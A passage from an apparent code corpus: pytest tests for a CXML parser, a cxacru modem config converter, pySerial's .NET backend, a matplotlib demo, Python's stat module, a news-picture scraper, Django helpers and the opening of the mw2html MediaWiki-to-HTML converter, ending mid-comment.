        input_, root_symbol, expected_values = attrs_fixture
        ast = parse(input_, attrs)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_an_element(self, element_fixture):
        input_, root_symbol, expected_values = element_fixture
        ast = parse(input_, element)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_tree(self, tree_fixture):
        input_, root_symbol, expected_values = tree_fixture
        ast = parse(input_, tree)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_tree_list(self, tree_list_fixture):
        input_, root_symbol, expected_values = tree_list_fixture
        ast = parse(input_, tree_list)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_trees(self, trees_fixture):
        input_, root_symbol, expected_values = trees_fixture
        ast = parse(input_, trees)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_root_element(self, root_element_fixture):
        input_, root_symbol, expected_values = root_element_fixture
        ast = parse(input_, root_element)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_root(self, root_fixture):
        input_, root_symbol, expected_values = root_fixture
        # the root production is the only one that consumes the sentinel
        # (SNTL) token, so the lexer must be asked to emit it
        ast = parse(input_, root, emit_sntl=True)
        assert shallow_eq(ast, root_symbol, expected_values)
    # fixtures -------------------------------------------------------
    @pytest.fixture(params=[
        ('w:', attr, [(nsdecl, 'w:')]),
        ('w:b=1', attr, [(str_attr, 'w:b=1')]),
    ])
    def attr_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('w:b=1', attr_list, [(attr, 'w:b=1')]),
        ('r:,w:b=1', attr_list, [
            (attr, 'r:'), (COMMA, ','), (attr_list, 'w:b=1')
        ]),
        ('r:,w:b=1,w:i=0', attr_list, [
            (attr, 'r:'), (COMMA, ','), (attr_list, 'w:b=1,w:i=0')
        ]),
    ])
    def attr_list_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('{w:}', attrs, [(LBRACE, '{'), (attr_list, 'w:'), (RBRACE, '}')]),
        ('{w:b=1,r:,w:i=0}', attrs, [
            (LBRACE, '{'), (attr_list, 'w:b=1,r:,w:i=0'), (RBRACE, '}')
        ]),
    ])
    def attrs_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('w:t', element, [(qname, 'w:t')]),
        ('w:t"foo"', element, [(qname, 'w:t'), (TEXT, 'foo')]),
        ('w:t{b=1}', element, [(qname, 'w:t'), (attrs, '{b=1}')]),
        ('w:t{b=1}"foo"', element, [
            (qname, 'w:t'), (attrs, '{b=1}'), (TEXT, 'foo')
        ]),
    ])
    def element_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('w:', nsdecl, [(NAME, 'w'), (COLON, ':')]),
    ])
    def nsdecl_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('foobar', qname, [(NAME, 'foobar')]),
        ('w:rPr', qname, [(NAME, 'w'), (COLON, ':'), (NAME, 'rPr')]),
    ])
    def qname_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('w:b=1', str_attr, [(qname, 'w:b'), (EQUAL, '='), (TEXT, '1')]),
    ])
    def str_attr_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('elm', tree, [(element, 'elm')]),
        ('foo/bar', tree, [(element, 'foo'), (SLASH, '/'), (trees, 'bar')]),
    ])
    def tree_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('foo', tree_list, [(tree, 'foo')]),
        ('foo,bar', tree_list, [
            (tree, 'foo'), (COMMA, ','), (tree_list, 'bar')
        ]),
    ])
    def tree_list_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('foo', trees, [(tree, 'foo')]),
        ('(foo,bar)', trees, [
            (LPAREN, '('), (tree_list, 'foo,bar'), (RPAREN, ')')
        ]),
    ])
    def trees_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('w:rPr', root_element, [(qname, 'w:rPr')]),
        ('w:t"foo"', root_element, [(qname, 'w:t'), (TEXT, 'foo')]),
        ('w:t{a=b}', root_element, [(qname, 'w:t'), (attrs, '{a=b}')]),
        ('w:t{a=b}bar', root_element, [
            (qname, 'w:t'), (attrs, '{a=b}'), (TEXT, 'bar')
        ]),
    ])
    def root_element_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
    @pytest.fixture(params=[
        ('w:r', root, [(root_element, 'w:r'), (SNTL, '')]),
        ('w:r/(w:rPr,w:t)', root, [
            (root_element, 'w:r'), (SLASH, '/'), (trees, '(w:rPr,w:t)'),
            (SNTL, '')
        ]),
    ])
    def root_fixture(self, request):
        input_, root_symbol, expected_values = request.param
        return input_, root_symbol, expected_values
def parse(string, start_symbol, emit_sntl=False):
    """
    Return the |ASTNode| produced by running *string* through CxmlLexer and
    CxmlParser, with the parse rooted at *start_symbol*.  *emit_sntl* is
    forwarded to the lexer so the sentinel token can be produced when the
    grammar under test requires it.
    """
    return CxmlParser(CxmlLexer(string, emit_sntl=emit_sntl)).parse(start_symbol)
def shallow_eq(ast, root_symbol, values):
    """
    Return |True| if the root node of *ast* bears *root_symbol* and its
    immediate children match *values*, a sequence of (symbol, value) pairs.
    Each mismatch is reported on stdout before returning |False|, as a
    debugging aid when an assertion fails.
    """
    if ast.symbol is not root_symbol:
        print('root symbol %s != %s' % (ast.symbol, root_symbol))
        return False
    child_nodes = ast.child_nodes
    if len(child_nodes) != len(values):
        print('child count: %d != %d' % (len(child_nodes), len(values)))
        return False
    # lengths are equal, so zip covers every child/value pair
    for child, (symbol, value) in zip(child_nodes, values):
        if child.symbol != symbol:
            print('child symbol %s != %s' % (child.symbol, symbol))
            return False
        if child.value != value:
            print('child value %s != %s' % (child.value, value))
            return False
    return True
| mit |
VenJie/linux_2.6.36 | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
# Read packed little-endian u32 values from stdin and print them as
# space-separated "index(hex)=value" pairs on a single line, in the form
# the cxacru sysfs adsl_config attribute expects.
index = 0
while True:
    word = sys.stdin.read(4)
    if not word:
        # clean EOF on a 4-byte boundary: done
        break
    if len(word) != 4:
        # truncated trailing value: terminate the output line, complain, bail
        sys.stdout.write("\n")
        sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(word)))
        sys.exit(1)
    if index > 0:
        sys.stdout.write(" ")
    sys.stdout.write("{0:x}={1}".format(index, struct.unpack("<I", word)[0]))
    index += 1
sys.stdout.write("\n")
| gpl-3.0 |
etherkit/OpenBeacon2 | client/linux-arm/venv/lib/python3.5/site-packages/serial/serialcli.py | 26 | 9104 | #! python
#
# Backend for .NET/Mono (IronPython), .NET >= 2
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2008-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import System
import System.IO.Ports
from serial.serialutil import *
# must invoke function with byte array, make a helper to convert strings
# to byte arrays
sab = System.Array[System.Byte]
def as_byte_array(string):
    """Convert *string* to a .NET ``Byte[]`` by mapping every character to
    its ordinal value."""
    # XXX will require adaption when run with a 3.x compatible IronPython
    return sab(list(map(ord, string)))
class Serial(SerialBase):
    """Serial port implementation for .NET/Mono."""
    # NOTE: this backend wraps System.IO.Ports.SerialPort from the CLR, so
    # it is only usable under IronPython (.NET or Mono) where the "System"
    # namespace imported above is available.
    BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
                 9600, 19200, 38400, 57600, 115200)
    def open(self):
        """\
        Open port with current settings. This may throw a SerialException
        if the port cannot be opened.
        """
        if self._port is None:
            raise SerialException("Port must be configured before it can be used.")
        if self.is_open:
            raise SerialException("Port is already open.")
        try:
            self._port_handle = System.IO.Ports.SerialPort(self.portstr)
        except Exception as msg:
            self._port_handle = None
            raise SerialException("could not open port %s: %s" % (self.portstr, msg))
        # if RTS and/or DTR are not set before open, they default to True
        if self._rts_state is None:
            self._rts_state = True
        if self._dtr_state is None:
            self._dtr_state = True
        self._reconfigure_port()
        self._port_handle.Open()
        self.is_open = True
        # apply the line states unless the flow-control modes own them
        if not self._dsrdtr:
            self._update_dtr_state()
        if not self._rtscts:
            self._update_rts_state()
        self.reset_input_buffer()
    def _reconfigure_port(self):
        """Set communication parameters on opened port."""
        if not self._port_handle:
            raise SerialException("Can only operate on a valid port handle")
        #~ self._port_handle.ReceivedBytesThreshold = 1
        # pySerial timeouts are in seconds (or None); SerialPort wants
        # milliseconds (or InfiniteTimeout)
        if self._timeout is None:
            self._port_handle.ReadTimeout = System.IO.Ports.SerialPort.InfiniteTimeout
        else:
            self._port_handle.ReadTimeout = int(self._timeout * 1000)
        # if self._timeout != 0 and self._interCharTimeout is not None:
        #     timeouts = (int(self._interCharTimeout * 1000),) + timeouts[1:]
        if self._write_timeout is None:
            self._port_handle.WriteTimeout = System.IO.Ports.SerialPort.InfiniteTimeout
        else:
            self._port_handle.WriteTimeout = int(self._write_timeout * 1000)
        # Setup the connection info.
        try:
            self._port_handle.BaudRate = self._baudrate
        except IOError as e:
            # catch errors from illegal baudrate settings
            raise ValueError(str(e))
        if self._bytesize == FIVEBITS:
            self._port_handle.DataBits = 5
        elif self._bytesize == SIXBITS:
            self._port_handle.DataBits = 6
        elif self._bytesize == SEVENBITS:
            self._port_handle.DataBits = 7
        elif self._bytesize == EIGHTBITS:
            self._port_handle.DataBits = 8
        else:
            raise ValueError("Unsupported number of data bits: %r" % self._bytesize)
        if self._parity == PARITY_NONE:
            self._port_handle.Parity = getattr(System.IO.Ports.Parity, 'None')    # reserved keyword in Py3k
        elif self._parity == PARITY_EVEN:
            self._port_handle.Parity = System.IO.Ports.Parity.Even
        elif self._parity == PARITY_ODD:
            self._port_handle.Parity = System.IO.Ports.Parity.Odd
        elif self._parity == PARITY_MARK:
            self._port_handle.Parity = System.IO.Ports.Parity.Mark
        elif self._parity == PARITY_SPACE:
            self._port_handle.Parity = System.IO.Ports.Parity.Space
        else:
            raise ValueError("Unsupported parity mode: %r" % self._parity)
        if self._stopbits == STOPBITS_ONE:
            self._port_handle.StopBits = System.IO.Ports.StopBits.One
        elif self._stopbits == STOPBITS_ONE_POINT_FIVE:
            self._port_handle.StopBits = System.IO.Ports.StopBits.OnePointFive
        elif self._stopbits == STOPBITS_TWO:
            self._port_handle.StopBits = System.IO.Ports.StopBits.Two
        else:
            raise ValueError("Unsupported number of stop bits: %r" % self._stopbits)
        # map pySerial's independent rtscts/xonxoff flags onto the single
        # .NET Handshake enumeration
        if self._rtscts and self._xonxoff:
            self._port_handle.Handshake = System.IO.Ports.Handshake.RequestToSendXOnXOff
        elif self._rtscts:
            self._port_handle.Handshake = System.IO.Ports.Handshake.RequestToSend
        elif self._xonxoff:
            self._port_handle.Handshake = System.IO.Ports.Handshake.XOnXOff
        else:
            self._port_handle.Handshake = getattr(System.IO.Ports.Handshake, 'None')    # reserved keyword in Py3k
    #~ def __del__(self):
    #~     self.close()
    def close(self):
        """Close port"""
        if self.is_open:
            if self._port_handle:
                try:
                    self._port_handle.Close()
                except System.IO.Ports.InvalidOperationException:
                    # ignore errors. can happen for unplugged USB serial devices
                    pass
                self._port_handle = None
            self.is_open = False
    # - - - - - - - - - - - - - - - - - - - - - - - -
    @property
    def in_waiting(self):
        """Return the number of characters currently in the input buffer."""
        if not self.is_open:
            raise portNotOpenError
        return self._port_handle.BytesToRead
    def read(self, size=1):
        """\
        Read size bytes from the serial port. If a timeout is set it may
        return less characters as requested. With no timeout it will block
        until the requested number of bytes is read.
        """
        if not self.is_open:
            raise portNotOpenError
        # must use single byte reads as this is the only way to read
        # without applying encodings
        data = bytearray()
        while size:
            try:
                data.append(self._port_handle.ReadByte())
            except System.TimeoutException:
                # timeout: return whatever was collected so far
                break
            else:
                size -= 1
        return bytes(data)
    def write(self, data):
        """Output the given string over the serial port."""
        if not self.is_open:
            raise portNotOpenError
        #~ if not isinstance(data, (bytes, bytearray)):
        #~     raise TypeError('expected %s or bytearray, got %s' % (bytes, type(data)))
        try:
            # must call overloaded method with byte array argument
            # as this is the only one not applying encodings
            self._port_handle.Write(as_byte_array(data), 0, len(data))
        except System.TimeoutException:
            raise writeTimeoutError
        return len(data)
    def reset_input_buffer(self):
        """Clear input buffer, discarding all that is in the buffer."""
        if not self.is_open:
            raise portNotOpenError
        self._port_handle.DiscardInBuffer()
    def reset_output_buffer(self):
        """\
        Clear output buffer, aborting the current output and
        discarding all that is in the buffer.
        """
        if not self.is_open:
            raise portNotOpenError
        self._port_handle.DiscardOutBuffer()
    def _update_break_state(self):
        """
        Set break: Controls TXD. When active, to transmitting is possible.
        """
        if not self.is_open:
            raise portNotOpenError
        self._port_handle.BreakState = bool(self._break_state)
    def _update_rts_state(self):
        """Set terminal status line: Request To Send"""
        if not self.is_open:
            raise portNotOpenError
        self._port_handle.RtsEnable = bool(self._rts_state)
    def _update_dtr_state(self):
        """Set terminal status line: Data Terminal Ready"""
        if not self.is_open:
            raise portNotOpenError
        self._port_handle.DtrEnable = bool(self._dtr_state)
    @property
    def cts(self):
        """Read terminal status line: Clear To Send"""
        if not self.is_open:
            raise portNotOpenError
        return self._port_handle.CtsHolding
    @property
    def dsr(self):
        """Read terminal status line: Data Set Ready"""
        if not self.is_open:
            raise portNotOpenError
        return self._port_handle.DsrHolding
    @property
    def ri(self):
        """Read terminal status line: Ring Indicator"""
        if not self.is_open:
            raise portNotOpenError
        #~ return self._port_handle.XXX
        # SerialPort exposes no ring-indicator property here, so this
        # always reports False
        return False    # XXX an error would be better
    @property
    def cd(self):
        """Read terminal status line: Carrier Detect"""
        if not self.is_open:
            raise portNotOpenError
        return self._port_handle.CDHolding
    # - - platform specific - - - -
    # none
| gpl-3.0 |
cactusbin/nyt | matplotlib/examples/axes_grid/demo_colorbar_with_inset_locator.py | 7 | 1052 | import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
# Demonstrate placing colorbars inside/next to axes with inset_axes.
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=[6, 3])
# First axes: a horizontal colorbar inset in the upper-right corner.
axins1 = inset_axes(ax1,
                    width="50%",  # width = 50% of parent_bbox width
                    height="5%",  # height = 5% of parent_bbox height
                    loc=1)  # loc=1: upper right
im1=ax1.imshow([[1,2],[2, 3]])
plt.colorbar(im1, cax=axins1, orientation="horizontal", ticks=[1,2,3])
# put the tick labels below the bar so they do not overlap the image
axins1.xaxis.set_ticks_position("bottom")
# Second axes: a vertical colorbar anchored just outside the right edge.
axins = inset_axes(ax2,
                   width="5%",  # width = 5% of parent_bbox width
                   height="50%",  # height = 50% of parent_bbox height
                   loc=3,  # loc=3: lower left (of the shifted anchor box)
                   bbox_to_anchor=(1.05, 0., 1, 1),
                   bbox_transform=ax2.transAxes,
                   borderpad=0,
                   )
# Controlling the placement of the inset axes is basically same as that
# of the legend. you may want to play with the borderpad value and
# the bbox_to_anchor coordinate.
im=ax2.imshow([[1,2],[2, 3]])
plt.colorbar(im, cax=axins, ticks=[1,2,3])
plt.draw()
plt.show()
| unlicense |
rfinn/LCS | paper1code/LCSgetfinalellipse.py | 1 | 1122 | #!/usr/bin/env python
"""
grab contents of directories of post-ellipse-processed images so we can track what happened to each galaxy.
did r-band make it to final finished directory?
did 24um make it to final finished directory?
if not, what happened?
NerabyObjects
OffCenter
PartialImages
PeculiarGalaxies
Finished
Finished also has reject subdirectory
"""
from pylab import *
import glob
import os
from LCScommon import *
originaldir='/home/rfinn/research/LocalClusters/cutouts/' #where original cutouts are
cutoutpath='/home/alissa/LocalClusters/cutouts/' # where processed cutouts are
# sorting bins used after ellipse processing; 'Finished' also holds 'reject'
subdirectories=['NearbyObjects','OffCenter','PartialImages','PeculiarGalaxies','Finished','Finished/reject']

for cl in clusternames: #loop over clusters
    #get list of original cutouts
    #make dictionary that associates agc name with list index
    #loop over subdirectories
    #ellipseflag24 for finished 24
    #ellipseid24 to track why galaxy was rejected
    #ellipseflag for finished rband
    #ellipseid to track why galaxy was rejected
    #add columns to mastertable? or should I do that in LCSmkcutouts?
    # Bug fix: the loop body contained only comments, which is a syntax
    # error (IndentationError) that made the whole script unrunnable.
    pass  # TODO: implement the bookkeeping sketched in the comments above
| gpl-3.0 |
yqm/sl4a | python/src/Lib/stat.py | 179 | 1718 | """Constants/functions for interpreting results of os.stat() and os.lstat().
Suggested usage: from stat import *
"""
# Indices for stat struct members in the tuple returned by os.stat()
ST_MODE = 0
ST_INO = 1
ST_DEV = 2
ST_NLINK = 3
ST_UID = 4
ST_GID = 5
ST_SIZE = 6
ST_ATIME = 7
ST_MTIME = 8
ST_CTIME = 9
# Extract bits from the mode
def S_IMODE(mode):
    """Return the part of the mode that can be set by os.chmod(): the
    permission bits plus the sticky/set-uid/set-gid bits."""
    return mode & 07777
def S_IFMT(mode):
    """Return the part of the mode that describes the file type."""
    return mode & 0170000
# Constants used as S_IFMT() for various file types
# (not all are implemented on all systems)
S_IFDIR = 0040000
S_IFCHR = 0020000
S_IFBLK = 0060000
S_IFREG = 0100000
S_IFIFO = 0010000
S_IFLNK = 0120000
S_IFSOCK = 0140000
# Functions to test for each file type
def S_ISDIR(mode):
    """Return True if mode is from a directory."""
    return S_IFMT(mode) == S_IFDIR
def S_ISCHR(mode):
    """Return True if mode is from a character special device file."""
    return S_IFMT(mode) == S_IFCHR
def S_ISBLK(mode):
    """Return True if mode is from a block special device file."""
    return S_IFMT(mode) == S_IFBLK
def S_ISREG(mode):
    """Return True if mode is from a regular file."""
    return S_IFMT(mode) == S_IFREG
def S_ISFIFO(mode):
    """Return True if mode is from a FIFO (named pipe)."""
    return S_IFMT(mode) == S_IFIFO
def S_ISLNK(mode):
    """Return True if mode is from a symbolic link."""
    return S_IFMT(mode) == S_IFLNK
def S_ISSOCK(mode):
    """Return True if mode is from a socket."""
    return S_IFMT(mode) == S_IFSOCK
# Names for permission bits
S_ISUID = 04000
S_ISGID = 02000
S_ENFMT = S_ISGID
S_ISVTX = 01000
S_IREAD = 00400
S_IWRITE = 00200
S_IEXEC = 00100
S_IRWXU = 00700
S_IRUSR = 00400
S_IWUSR = 00200
S_IXUSR = 00100
S_IRWXG = 00070
S_IRGRP = 00040
S_IWGRP = 00020
S_IXGRP = 00010
S_IRWXO = 00007
S_IROTH = 00004
S_IWOTH = 00002
S_IXOTH = 00001
# Names for file flags
UF_NODUMP = 0x00000001
UF_IMMUTABLE = 0x00000002
UF_APPEND = 0x00000004
UF_OPAQUE = 0x00000008
UF_NOUNLINK = 0x00000010
SF_ARCHIVED = 0x00010000
SF_IMMUTABLE = 0x00020000
SF_APPEND = 0x00040000
SF_NOUNLINK = 0x00100000
SF_SNAPSHOT = 0x00200000
| apache-2.0 |
SHSTuringClub/aria | sites/bjnews.py | 1 | 2445 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Aria - A simple script for automatically grabbing news from the Internet.
# Copyright (C) 2015 Genesis Di
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
def get(timestamp_thr=0):
    """Fetch the Beijing News (新京报) hot list and return its picture items.

    Only entries that have a picture and were submitted after
    *timestamp_thr* (a Unix timestamp) are kept.  Each picture is
    downloaded into a local ``pic`` directory.  Returns a list of dicts
    with keys title/time/timestamp/source/pic/pic_src, sorted newest
    first.  Exits the process on a network or parse failure.
    """
    import httplib2
    import urllib.request
    import os
    import sys
    import json
    import time

    TIMEFORMAT = '%Y-%m-%d %X'
    h = httplib2.Http(os.devnull) # Currently no cache file is needed
    (resp_headers, content) = h.request("http://www.bjnews.com.cn/api/get_hotlist.php", "GET")
    if resp_headers['status'] != '200':
        print("Fatal Error: return value " + resp_headers['status'] + "!! Check Internet connection... Exiting...")
        sys.exit(1)
    try:
        tmpdata = json.loads(str(content.decode('unicode-escape')))['list']
        if not os.path.exists('pic'):
            os.mkdir('pic')
        data = []
        for i in tmpdata:
            # keep only entries with a picture newer than the threshold
            if i['hot_pic'] and time.mktime(time.strptime(i['submit_time'], TIMEFORMAT)) > timestamp_thr:
                tmp = {}
                tmp['title'] = i['title']
                tmp['time'] = time.strptime(i['submit_time'], TIMEFORMAT)
                tmp['timestamp'] = time.mktime(tmp['time'])
                tmp['source'] = '新京报'
                # NOTE(review): hash() is salted per interpreter run in
                # Python 3, so these file names are not stable across runs;
                # confirm that is acceptable before relying on them as a cache.
                pic_path = 'pic' + os.sep + str(hash(str(tmp))) + '.jpg'
                # Makes sure that no pictures are downloaded with the same file name.
                urllib.request.urlretrieve(i['hot_pic'], pic_path)
                tmp['pic'] = pic_path
                tmp['pic_src'] = i['hot_pic']
                data.append(tmp)
    except Exception as e:
        # Bug fix: the original printed the literal word 'Exception'
        # instead of the exception's type, hiding what actually failed.
        print("Exception occurred! Quitting... " + type(e).__name__ + ":" + str(e))
        sys.exit(1)
    data = sorted(data, key=lambda j: j['timestamp'], reverse=True)
    return data
| gpl-3.0 |
OrlyMar/gasistafelice | gasistafelice/lib/djangolib.py | 6 | 1957 |
def get_qs_filter_dict_from_str(flt_string):
    """Parse a QuerySet filter expressed as a string into a dict.

    *flt_string* is a comma-separated list of ``key=value`` pairs, e.g.
    ``"name=foo,age=3"``; the result is suitable for unpacking into
    ``QuerySet.filter(**flt)``.  A ``ValueError`` propagates to the caller
    when any pair is not exactly ``key=value``.
    """
    flt = {}
    # str.split(',') yields a one-element list when there is no comma, so
    # the original duplicated single-pair/multi-pair branches collapse
    # into one loop with identical behavior.
    for couple in flt_string.split(','):
        k, v = couple.split('=')  # raises ValueError on malformed pairs
        flt[k] = v
    return flt
def get_instance_dict_from_attrs(obj, attr_names):
    """Build a dict mapping each name in *attr_names* to the corresponding
    attribute of *obj*.

    Dotted names ("a.b.c") are followed through nested attributes, and a
    callable leaf is invoked with no arguments, so zero-argument methods
    can be listed alongside plain attributes (handy for templates).
    """
    result = {}
    for dotted_name in attr_names:
        value = obj
        # walk the attribute chain one segment at a time
        for segment in dotted_name.split('.'):
            value = getattr(value, segment)
        result[dotted_name] = value() if callable(value) else value
    return result
def queryset_from_iterable(model, iterable):
    """
    Take a model class and an iterable containing instances of that model;
    return a ``QuerySet`` containing exactly those instances (barring duplicates, if any).
    If ``iterable`` contains an object that isn't an instance of ``model``, raise ``TypeError``.
    """
    # collect the set of IDs (i.e. primary keys) of model instances
    # contained in the given iterable (using a ``set`` object as accumulator,
    # in order to avoid duplicates)
    id_set = set()
    for obj in iterable:
        if obj.__class__ == model:
            id_set.add(obj.pk)
        else:
            # Bug fix: the %(model)s/%(obj)s placeholders were never
            # substituted, so the error message showed raw placeholders.
            # NOTE(review): ``_`` (gettext) is assumed to be imported at
            # module level -- confirm.
            raise TypeError(_(u"Can't create a %(model)s QuerySet: %(obj)s is not an instance of model %(model)s")
                            % {'model': model.__name__, 'obj': obj})
    qs = model._default_manager.filter(pk__in=id_set)
    return qs
| agpl-3.0 |
0-wiz-0/audacity | scripts/mw2html_audacity/mw2html.py | 16 | 36761 | #! /usr/bin/env python
"""
mw2html - Mediawiki to static HTML
I use this to create a personal website from a local mediawiki
installation. No search functionality. Hacks the Monobook skin and
the produced HTML.
Connelly Barnes 2005. Public domain.
Reworked by Andre Pinto 2009.
Improved performance.
Improved filtering.
Improved usability.
Customized for Audacity's manual wiki.
Minor tweaks (for Audacity) By James Crook, Nov 2009.
...
"""
__version__ = '0.1.0.0'
import re
import sys
import getopt
import random
import urllib
import textwrap
import urlparse
import os, os.path
import errno
import hashlib
import httplib
#import pdb
from time import strftime
try:
set
except:
from sets import Set as set
try:
import htmldata
except:
print 'Requires Python htmldata module:'
print ' http://www.connellybarnes.com/code/htmldata/'
sys.exit()
config = None
MOVE_HREF = 'movehref'
MADE_BY_COMMENT = '<!-- Content generated by Mediawiki and mw2html -->'
INDEX_HTML = 'index.html'
QHELP_HTML = 'quick_help.html'
url_filename_cache = {}
redir_cache = {}
wrote_file_set = set()
sidebar_html = ''
footer_text = ''
counter = 0
errors = 0
conn = None
domain = ''
MONOBOOK_SKIN = 'monobook' # Constant identifier for Monobook.
class Config:
    """
    Bag of all command-line options that drive one mw2html run.
    """
    def __init__(self, rooturl, outdir,
                 flatten=True, index=None, clean=True,
                 sidebar=None, hack_skin=True,
                 made_by=True, overwrite=False, footer=None,
                 skin=MONOBOOK_SKIN, move_href=True,
                 remove_png=True, remove_history=True, limit_parent=False,
                 special_mode=False, debug=False, no_images=False):
        # Filesystem paths are normalised to absolute form up front so a
        # later chdir cannot change their meaning.
        self.rooturl = rooturl
        self.outdir = os.path.abspath(outdir)
        self.sidebar = None if sidebar is None else os.path.abspath(sidebar)
        self.footer = None if footer is None else os.path.abspath(footer)
        # Remaining switches are stored verbatim.
        self.flatten = flatten
        self.index = index
        self.clean = clean
        self.hack_skin = hack_skin
        self.made_by = made_by
        self.overwrite = overwrite
        self.skin = skin
        self.move_href = move_href
        self.remove_png = remove_png
        self.remove_history = remove_history
        self.limit_parent = limit_parent
        self.special_mode = special_mode
        self.debug = debug
        self.no_images = no_images
def get_domain(u):
    """
    Return the network-location (host[:port]) component of URL *u*,
    after canonicalising it with normalize_url().
    """
    normalized = normalize_url(u)
    # urlparse splits a URL into
    # (scheme, netloc, path, params, query, fragment); index 1 is netloc.
    return urlparse.urlparse(normalized)[1]
def normalize_url(url, lower=True):
    """
    Canonicalize *url* for local comparisons (cache keys, visited sets).

    Strips any #section, optionally lower-cases, drops the scheme and a
    leading 'www.', trims slashes, then re-attaches 'http://'.  Use the
    original URL (not this) for actual network requests.
    """
    url = split_section(url)[0]
    if lower:
        url = url.lower()
    if url.startswith('http://'):
        url = url[len('http://'):]
    if url.startswith('www.'):
        url = url[len('www.'):]
    url = url.strip('/')
    # Bug fix: a stray `urlparse.urljoin(config.rooturl, url)` call used to
    # sit here; its result was discarded, so it was pure dead code (and an
    # unnecessary dependency on the global config).
    return 'http://' + url
def find_tag_limits(doc, filter_string, end_tag, start_tag, start_point=0):
    """
    Locate the tag region identified by *filter_string* inside *doc*.

    Returns (start, end): start is the index of the enclosing *start_tag*,
    end is the index of the balanced *end_tag* (nested tags are counted).
    Returns (-1, -1) when *filter_string* is not found, and (-2, pos) when
    it was found without an enclosing *start_tag* -- callers should resume
    scanning from *pos*.
    """
    # find tag limits - start_string must be an unique identifier within doc
    i1 = doc.find(filter_string, start_point)
    if i1 == -1:
        return (-1, -1)
    # Back up to the start_tag ('<div', '<span', ...) containing the match.
    aux = doc.rfind(start_tag, start_point, i1 + len(filter_string))
    # we've found the filter_string but it has not the start_tag, so we return a different value
    # telling the script to keep searching starting on the end of the filter_string found
    if aux == -1:
        return (-2, i1 + len(filter_string))
    i1 = aux
    # Pair up start/end tags until the counts balance to find the matching
    # end tag for this (possibly nested) region.
    sdiv = i1
    ediv = i1 + len(start_tag)
    while(sdiv < ediv and sdiv != -1):
        sdiv = doc.find(start_tag, sdiv + len(start_tag))
        ediv = doc.find(end_tag , ediv + len(end_tag))
    return (i1, ediv)
def clean_tag(doc, filter_string, end_tag, start_tag):
    """
    Remove the surrounding tags (but keep the inner content) of every
    region identified by *filter_string*.
    """
    #clean tagged text function
    start_point = 0
    while True:
        (start1, start2) = find_tag_limits(doc, filter_string, end_tag, start_tag, start_point)
        if start1 == -1 or start2 == -1:
            return doc
        if start1 == -2:
            # filter_string found with no enclosing start_tag: skip past it.
            start_point = start2
            continue
        # Cut the opening tag (up to its '>') and the closing tag, keeping
        # everything in between.
        end1 = doc.find('>', start1) + 1;
        end2 = start2 + len(end_tag);
        doc = doc[:start1] + doc[end1:start2] + doc[end2:]
def remove_tag(doc, start_string, end_tag, start_tag):
    """
    Delete every tagged region identified by *start_string*, tags and
    content included.
    """
    #remove tagged text function
    start_point = 0
    while True:
        (i1, i2) = find_tag_limits(doc, start_string, end_tag, start_tag, start_point)
        if i1 == -1 or i2 == -1:
            return doc
        if i1 == -2:
            # Bug fix: find_tag_limits returns (-2, pos) when start_string
            # appears without an enclosing start_tag.  The old code fell
